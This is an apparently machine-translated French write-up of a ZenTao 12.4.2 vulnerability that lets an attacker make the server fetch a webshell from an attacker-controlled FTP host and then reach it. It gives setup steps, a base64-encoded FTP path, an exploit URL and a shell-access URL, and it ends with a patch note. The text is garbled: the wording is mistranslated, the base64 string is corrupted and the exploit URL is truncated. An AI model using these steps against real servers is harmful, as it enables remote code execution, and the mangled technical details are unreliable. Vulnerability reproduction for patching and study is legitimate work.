Quels sont les droits d'administrateur en arrière-plan de Getshell dans ZenTao 12.4.2 ?

0x00Introduction

ZenTao est un logiciel professionnel de gestion de projet de R&D open source national qui intègre la gestion de produits, la gestion de projet, la gestion de la qualité, la gestion des documents, la gestion organisationnelle et la gestion des transactions, couvrant complètement les processus de base du projet de R&D. gestion. L'idée de gestion est basée sur la méthode de gestion de projet agile de renommée internationale - Scrum. Sur la base du respect de ses valeurs et de la combinaison de l'état actuel de la recherche et du développement de projets nationaux, elle intègre de multiples fonctions telles que la gestion des tâches, la gestion de la demande, les bugs. gestion, gestion des cas d'utilisation, etc., couvrant le logiciel depuis la planification jusqu'à l'ensemble du cycle de vie d'une version.

Aperçu de la vulnérabilité 0x01

Il existe une vulnérabilité de téléchargement de fichiers arbitraire dans ZenTao version 12.4.2. Cette vulnérabilité est due au fait que le filtrage dans la méthode de téléchargement dans la classe client n'est pas strict et que FTP peut être utilisé pour télécharger des fichiers. Et le répertoire de stockage des fichiers téléchargés peut analyser les fichiers php, provoquant getshell.

0x02 version affectée

ZenTao ≤ 12.4.2

0x03 environnement construction

phpstudy2018 + ZenTao 12.4.2 Adresse de téléchargement officielle de ZenTao :

https://www.zentao.net/dynamic / zentaopms12. 4.2-80263.html

3.1. Après le téléchargement, placez-le dans phpstudy et installez-le

3.2. Vérifiez l'extension qui a échoué, ouvrez simplement l'extension dans phpstudy.

3.3. Définissez les informations de la base de données, définissez-les ici sur votre propre configuration de base de données.

3.4 Créez le compte et l'installation est terminée

3.4. Utilisez l'environnement pour créer le service FTP. En prenant Windows2008R2 comme exemple, ajoutez le rôle et ajoutez ftp

3.5. Ajoutez ensuite le service FTP au site Web sous Internet Information Services.

3.6. Configurez en fonction de votre propre situation, l'étape suivante est

3.7. Mettez un webshell dans le répertoire ftp puis vérifiez le navigateur pour voir si ftp est accessible. normalement

Récurrence de la vulnérabilité 0x04

1. Ajoutez d'abord le chemin du ftp au shell pour l'encodage base64

Avant le cryptage : ftp://192.168.3.200/shell.php

Après le cryptage : ZnRwJTNBLy8xOTIuMTY4Lj. MuMjAwL3NoZWxsLnBocA==

2.Utilisez EXP, placez le base64 chiffré dans le dans exp

http://127.0.0.1/zentaopms/www/index.php/client-download-1-

3. Utilisez le chemin du lien suivant pour tester si le shell a été téléchargé sur le serveur

http://192.168.3.200/zentaopms/www/data/client/1. /shell.php

Méthode de réparation 0x05

1 Mise à niveau vers ZenTao 12.4.3 et versions ultérieures

.

Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!